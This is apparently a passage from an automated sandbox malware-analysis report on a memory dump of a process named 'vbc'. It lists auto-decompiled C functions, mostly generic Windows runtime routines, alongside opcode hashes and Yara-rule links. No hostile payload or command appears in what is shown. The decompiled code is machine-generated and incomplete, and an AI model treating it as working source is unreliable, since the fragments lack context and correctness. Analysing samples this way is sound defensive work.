					return L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                  0x015e36d2
                                                  0x015e36e8
                                                  0x015e36d4
                                                  0x015e36e5
                                                  0x015e36e5

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction ID: 9ce18d1a7d0b2e6f0a9d2b5166bd8d78dff3585a7da67b80115b59959264bf7a
                                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                  • Instruction Fuzzy Hash: DAC02B70150440FBD7291F34CD40F187294F740A21F64035472214E8F0D5389C00D600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C76E2 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015C76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                  0x015c76e4
                                                  0x00000000
                                                  0x015c76f8
                                                  0x015c76fd

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction ID: 229ce2f6ba589d868a2ff024576e2b5f68f103c16ae82fc2370f03f3aabe4b0e
                                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                  • Instruction Fuzzy Hash: 12C08C781411815EEB2A5B4CCE22B283A50BB0CB48F88019CAA210D8A2C368A843CB08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015D7D50 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015D7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                  0x015d7d56
                                                  0x015d7d5b
                                                  0x015d7d60
                                                  0x015d7d5d
                                                  0x015d7d5d
                                                  0x015d7d5d

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                  • Instruction ID: d3e41d4215d18dc6dc9c48ab206d345d91c658dbb503a08d98daa64930b11c6d
                                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                  • Instruction Fuzzy Hash: 21B092353019408FCE26EF1CC080B1933E4BB49A44B8400D4E400CBA21D229E8008A00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E2ACB Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015E2ACB() {
				void* _t5;

				return E015CEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                  0x015e2adc

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction ID: d9534b729cbc7b9d40655d7c9ec45727cfb27a8b3780bdee556847867e1906aa
                                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction Fuzzy Hash: 72B01232C10442CFCF02EF80C610B297731FB40B50F05449490012B930C228AC01CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9950 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 114442009e48e582bd1cf45572e670af1d8f4c47800681a73858de994e82b637
                                                  • Instruction ID: d6f00c4f8cbfaffb984a812d8906808d24943218120d4016c8a6cd8f5861beca
                                                  • Opcode Fuzzy Hash: 114442009e48e582bd1cf45572e670af1d8f4c47800681a73858de994e82b637
                                                  • Instruction Fuzzy Hash: E19002A120140403D14569D94C056070009A7D0342F51C111A2054559EDAA98C517175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F99D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6efe408f49673cdb2cf940c9031f9b0eec232446be25a9bc9fa9fb413169502
                                                  • Instruction ID: a3e78b131a4f9f422e21671e1df9463b2ba9114efafb95658f3436dda02c3897
                                                  • Opcode Fuzzy Hash: f6efe408f49673cdb2cf940c9031f9b0eec232446be25a9bc9fa9fb413169502
                                                  • Instruction Fuzzy Hash: C09002A121100042D10965D948057070049A7E1241F51C112A2144558CD5A98C616165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015FB040 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6b6590c9013726c0aa72ccb2ec56339912b66398953111cdfc7f5983e12eab1
                                                  • Instruction ID: 2c064deed7fbe6b67fee411584c4b67c268cb05e754fa59d19373d1dcac7b0f8
                                                  • Opcode Fuzzy Hash: d6b6590c9013726c0aa72ccb2ec56339912b66398953111cdfc7f5983e12eab1
                                                  • Instruction Fuzzy Hash: 3C9002A1601140434545B5D94C054075019B7E1341391C221A0444564CD6E88855A2A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9820 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83747cc06096f7c4c2d39402b72107160f8e7b0571a9a9a930f1fc24560e0afb
                                                  • Instruction ID: 4591f55b6a20f528ad4b42d0acb3e3b421cab2bff2ef5c370de61380875925e2
                                                  • Opcode Fuzzy Hash: 83747cc06096f7c4c2d39402b72107160f8e7b0571a9a9a930f1fc24560e0afb
                                                  • Instruction Fuzzy Hash: 1890027124100402D14675D94805607000DB7D0281F91C112A0414558ED6D58A56BAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F98A0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 644712ccfe472dfa391dda1a8031d70d7760133cca2d61f30f0395dcc9e07c0b
                                                  • Instruction ID: d97c300d8ad1b6df13f23faa35809fe206a0d294218d4519e3c7e5db55145389
                                                  • Opcode Fuzzy Hash: 644712ccfe472dfa391dda1a8031d70d7760133cca2d61f30f0395dcc9e07c0b
                                                  • Instruction Fuzzy Hash: C590026130100402D10765D94815607000DE7D1385F91C112E1414559DD6A58953B172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa5914ea5cede99553d2190328ab0c2ec14d900a0eb46df8c7fb287e7acd120a
                                                  • Instruction ID: 01085cce99e3c7d84fae23ff61839ea1e67afe2a78ef81818bde12459ee5fd61
                                                  • Opcode Fuzzy Hash: aa5914ea5cede99553d2190328ab0c2ec14d900a0eb46df8c7fb287e7acd120a
                                                  • Instruction Fuzzy Hash: 6C90026124100802D14575D98815707000AE7D0641F51C111A0014558DD696896576F1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015FA3B0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc0d2b32e209ac1395ca815ddd64208f11d80a028ef62b7626aa1ff7e768d418
                                                  • Instruction ID: 36a815e39410652e3244b82af2a42ff9847851451161f0868780b6057d337a49
                                                  • Opcode Fuzzy Hash: cc0d2b32e209ac1395ca815ddd64208f11d80a028ef62b7626aa1ff7e768d418
                                                  • Instruction Fuzzy Hash: E090027120144002D14575D9884560B5009B7E0341F51C511E0415558CD6958856A261
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38d8db74d808865f9f2c33a939293d26e7ab1253d7c50c16ede2b7a698a3e3dd
                                                  • Instruction ID: 323b5dcaefba2bf5e77a04d90266ded3e2a06f2068e7c879f192036e5e3e2c01
                                                  • Opcode Fuzzy Hash: 38d8db74d808865f9f2c33a939293d26e7ab1253d7c50c16ede2b7a698a3e3dd
                                                  • Instruction Fuzzy Hash: C290027120140402D10565D94C097470009A7D0342F51C111A5154559ED6E5C8917571
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14837114b1c30f362c7fb62301149990fb2b7fe41cc8a03ab49d3c01381a4c2d
                                                  • Instruction ID: 9addc89dc5cae358ba2a264fb0e61b3928e33be855f41bdc3ddedaccbdbd90a1
                                                  • Opcode Fuzzy Hash: 14837114b1c30f362c7fb62301149990fb2b7fe41cc8a03ab49d3c01381a4c2d
                                                  • Instruction Fuzzy Hash: ED90026120144442D14566D94C05B0F4109A7E1242F91C119A4146558CD99588556761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9560 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d059be94fd62f46bb8b08da5ce3896a100d0fd3c9168eb33e06e9b822bcf3ea
                                                  • Instruction ID: 62ed18572b9b9df5abdb524c0b13b4831d32e51b7701b4543437e208ddac4ebe
                                                  • Opcode Fuzzy Hash: 7d059be94fd62f46bb8b08da5ce3896a100d0fd3c9168eb33e06e9b822bcf3ea
                                                  • Instruction Fuzzy Hash: 7190026522100002014AA9D90A0550B0449B7D6391391C115F1406594CD6A188656361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015FAD30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e17712bf2cb27c7a91fd38a665701da0abdeb997b899e0f986526cb7ee3605b5
                                                  • Instruction ID: 0023e4c832717b0734eaec10581fb5b7652a7569968fd50e41c4a1efb56f0c2b
                                                  • Opcode Fuzzy Hash: e17712bf2cb27c7a91fd38a665701da0abdeb997b899e0f986526cb7ee3605b5
                                                  • Instruction Fuzzy Hash: B2900271A0500012914575D94C15647400AB7E0781B55C111A0504558CD9D48A5563E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b93fe08a736a7bbe996187f4179b9bd417b11c44791f222b105bad1f1beda7d
                                                  • Instruction ID: 4f93602494480db02aca857081082815bdaaebf9a0947d15626b0eb3d2c6c7cd
                                                  • Opcode Fuzzy Hash: 2b93fe08a736a7bbe996187f4179b9bd417b11c44791f222b105bad1f1beda7d
                                                  • Instruction Fuzzy Hash: E19002E1201140924505A6D98805B0B4509A7E0241B51C116E1044564CD5A58851A175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F95F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c3ac0bed2febee0528fb0b399359009279309d06a39cd2c6e9cf85598bd4b2a
                                                  • Instruction ID: f7fe9abe38873de7bc4f4027048bc01e6debbb08e01e3e2b94d525b33d8c414e
                                                  • Opcode Fuzzy Hash: 1c3ac0bed2febee0528fb0b399359009279309d06a39cd2c6e9cf85598bd4b2a
                                                  • Instruction Fuzzy Hash: E390027120100802D10965D94C056870009A7D0341F51C111A6014659EE6E588917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015FA770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 149e6df1ccb2d78aedc0956646d4a7acf1bba2f1336ff257ff50e10ca9deb3f5
                                                  • Instruction ID: e5109aed48f92ff911ff572aff5c20ca767a58d0d1440cecf4a10171e34fc0ae
                                                  • Opcode Fuzzy Hash: 149e6df1ccb2d78aedc0956646d4a7acf1bba2f1336ff257ff50e10ca9deb3f5
                                                  • Instruction Fuzzy Hash: FE90027520504442D50569D95C05A870009A7D0345F51D511A041459CDD6D48861B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9770 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b047cedec6ab334d078f5035f614c82146c7f29a48498632a335debe2b24cb2
                                                  • Instruction ID: 86db6e11d756a9020586952e8e65b77ec577d83dffa4a7720ebae134616fb979
                                                  • Opcode Fuzzy Hash: 3b047cedec6ab334d078f5035f614c82146c7f29a48498632a335debe2b24cb2
                                                  • Instruction Fuzzy Hash: 2990026120504442D10569D95809A070009A7D0245F51D111A1054599DD6B58851B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9760 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2d3078544c6562518f3bea03f6f5e15a3814a282809209d24a8317771b675d4
                                                  • Instruction ID: f662b110779c01540b02ed77d86a14d4f8ab01f04e50318e5b7f906d87aaf255
                                                  • Opcode Fuzzy Hash: e2d3078544c6562518f3bea03f6f5e15a3814a282809209d24a8317771b675d4
                                                  • Instruction Fuzzy Hash: 8A90027120100403D10565D959097070009A7D0241F51D511A041455CDE6D688517161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015FA710 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 04c7dc1497b725ce0a9da633421f3412af1c0e588d5d28630bdadb655d9e9d99
                                                  • Instruction ID: 5f3b22f3d52df11d49287c90d4cf7b5b19ade60e688b436ee15cae6dd488ae8e
                                                  • Opcode Fuzzy Hash: 04c7dc1497b725ce0a9da633421f3412af1c0e588d5d28630bdadb655d9e9d99
                                                  • Instruction Fuzzy Hash: 3E900271301000529505AAD95C05A4B4109A7F0341B51D115A4004558CD5D488616161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9730 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d600629ca9fed2d30e12610cb68c3c88fb7700348dd73e8aef890855b9e474b
                                                  • Instruction ID: 9ab288b380617630ab11ca6dffdd0f95f1fb58a55df715cbe0f6f4da9be14fc2
                                                  • Opcode Fuzzy Hash: 6d600629ca9fed2d30e12610cb68c3c88fb7700348dd73e8aef890855b9e474b
                                                  • Instruction Fuzzy Hash: 4B90026160500402D14575D958197070019A7D0241F51D111A0014558DD6D98A5576E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9650 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce199d6ff87d8036f9fb10b576dc71cf9a76abbe00bea4f8dab3d9adae97f7d6
                                                  • Instruction ID: 838d44cde2cf837c7f730ab84a5a3533cd92bde1f61cfb959bb5d9c8cf1d7661
                                                  • Opcode Fuzzy Hash: ce199d6ff87d8036f9fb10b576dc71cf9a76abbe00bea4f8dab3d9adae97f7d6
                                                  • Instruction Fuzzy Hash: FA90027120504842D14575D94805A470019A7D0345F51C111A0054698DE6A58D55B6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9610 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28b9c4826b6c19ee0d30f055255527cfb5174c795f5b3b245133212793dc32cf
                                                  • Instruction ID: e382ca9cf6f7d82cec0cc3eef0f1f691fb4d7083b34384e29b301cb4695efa2d
                                                  • Opcode Fuzzy Hash: 28b9c4826b6c19ee0d30f055255527cfb5174c795f5b3b245133212793dc32cf
                                                  • Instruction Fuzzy Hash: 9F90027160500802D15575D948157470009A7D0341F51C111A0014658DD7D58A5576E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F96D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62556e73f8e29fd82b991e7777eb9430bfddba81a81c756f3ff593960f58c5c7
                                                  • Instruction ID: 06259e5e44a180d97fd53b05066b5218a05ffd0770fb3f0e734b606ba23cadc8
                                                  • Opcode Fuzzy Hash: 62556e73f8e29fd82b991e7777eb9430bfddba81a81c756f3ff593960f58c5c7
                                                  • Instruction Fuzzy Hash: 8C90027120100842D10565D94805B470009A7E0341F51C116A0114658DD695C8517561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: f4db01f9106cc0b288a4b4cce136047842d8a7bcbf51a2c42123b6925d5830ef
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0164FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E0164FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E015FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x0164fdda
                                                  0x0164fde2
                                                  0x0164fde5
                                                  0x0164fdec
                                                  0x0164fdfa
                                                  0x0164fdff
                                                  0x0164fe0a
                                                  0x0164fe0f
                                                  0x0164fe17
                                                  0x0164fe1e
                                                  0x0164fe19
                                                  0x0164fe19
                                                  0x0164fe19
                                                  0x0164fe20
                                                  0x0164fe21
                                                  0x0164fe22
                                                  0x0164fe25
                                                  0x0164fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0164FDFA
                                                  Strings
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0164FE01
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0164FE2B
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: dbedf9341319c07e6de6701265c0b1da20c38c37234be3b595a47991b459ffac
                                                  • Instruction ID: 4e37192bc6cceec199149381f155014a965561721d7e3f5323f17f8175a192db
                                                  • Opcode Fuzzy Hash: dbedf9341319c07e6de6701265c0b1da20c38c37234be3b595a47991b459ffac
                                                  • Instruction Fuzzy Hash: B6F0F632240202BFE7201A49DC02F73BF5AEB44B30F140318F7285A5D1DA62F82086F4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%